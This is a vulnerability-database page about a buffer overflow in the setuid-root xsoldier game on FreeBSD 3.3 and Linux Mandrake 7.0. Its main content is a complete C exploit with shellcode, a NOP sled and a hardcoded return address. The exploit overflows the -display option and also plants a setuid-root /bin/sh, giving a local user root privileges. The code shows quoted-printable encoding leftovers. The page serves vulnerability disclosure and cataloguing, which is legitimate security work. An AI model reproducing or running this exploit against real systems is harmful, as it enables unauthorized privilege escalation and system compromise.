Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

FreeBSD 3.3,Linux Mandrake 7.0 'xsoldier' Buffer Overflow Vulnerability (1)

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 16 Views

FreeBSD 3.3, Linux Mandrake 7.0 'xsoldier' Buffer Overflow Vulnerabilit

Code

                                                source: http://www.securityfocus.com/bid/871/info

Certain versions of FreeBSD (3.3 Confirmed) and Linux (Mandrake confirmed) ship with a vulnerable binary in their X11 games package. The binary/game in question, xsoldier, is a setuid root binary meant to be run via an X windows console.

The binary itself is subject to a buffer overflow attack (which may be launched from the command line) which can be launched to gain root privileges. The overflow itself is in the code written to handle the -display option and is possible to overflow by a user-supplied long string.

The user does not have to have a valid $DISPLAY to exploit this.

/* =

 * xsoldier exploit for Freebsd-3.3-RELEASE
 * Drops a suid root shell in /bin/sh
 * Brock Tellier [email protected]
 */


#include <stdio.h>

char shell[]=3D /* [email protected] */
  "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
   "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
   "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
   "\x9a>:)(:<\xe8\xc6\xff\xff\xff/tmp/ui";

#define CODE "void main() { chmod (\"/bin/sh\", 0004555);}\n"

void buildui() {
FILE *fp;
  char cc[100];
  fp =3D fopen("/tmp/ui.c", "w");
  fprintf(fp, CODE);
  fclose(fp);
  snprintf(cc, sizeof(cc), "cc -o /tmp/ui /tmp/ui.c");
  system(cc);
}

main (int argc, char *argv[] ) {
 int x =3D 0;
 int y =3D 0;
 int offset =3D 0;
 int bsize =3D 4400;
 char buf[bsize];
 int eip =3D 0xbfbfdb65; /* works for me */
 buildui();

 if (argv[1]) { =

   offset =3D atoi(argv[1]);
   eip =3D eip + offset;
 }
 fprintf(stderr, "xsoldier exploit for FreeBSD 3.3-RELEASE
<[email protected]>\n");
 fprintf(stderr, "Drops you a suid-root shell in /bin/sh\n");
 fprintf(stderr, "eip=3D0x%x offset=3D%d buflen=3D%d\n", eip, offset, bsi=
ze);
 =

 for ( x =3D 0; x < 4325; x++) buf[x] =3D 0x90;
     fprintf(stderr, "NOPs to %d\n", x);
 =

 for ( y =3D 0; y < 67 ; x++, y++) buf[x] =3D shell[y];
     fprintf(stderr, "Shellcode to %d\n",x);
  =

  buf[x++] =3D  eip & 0x000000ff;
  buf[x++] =3D (eip & 0x0000ff00) >> 8;
  buf[x++] =3D (eip & 0x00ff0000) >> 16;
  buf[x++] =3D (eip & 0xff000000) >> 24;
     fprintf(stderr, "eip to %d\n",x);

 buf[bsize]=3D'\0';

execl("/usr/X11R6/bin/xsoldier", "xsoldier", "-display", buf, NULL);

}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
buffer overflow vulnerabilityx11 games packagesetuid rootx windows consoleroot privilegesdisplay optionsuid root shellcode executionsecurity exploit
16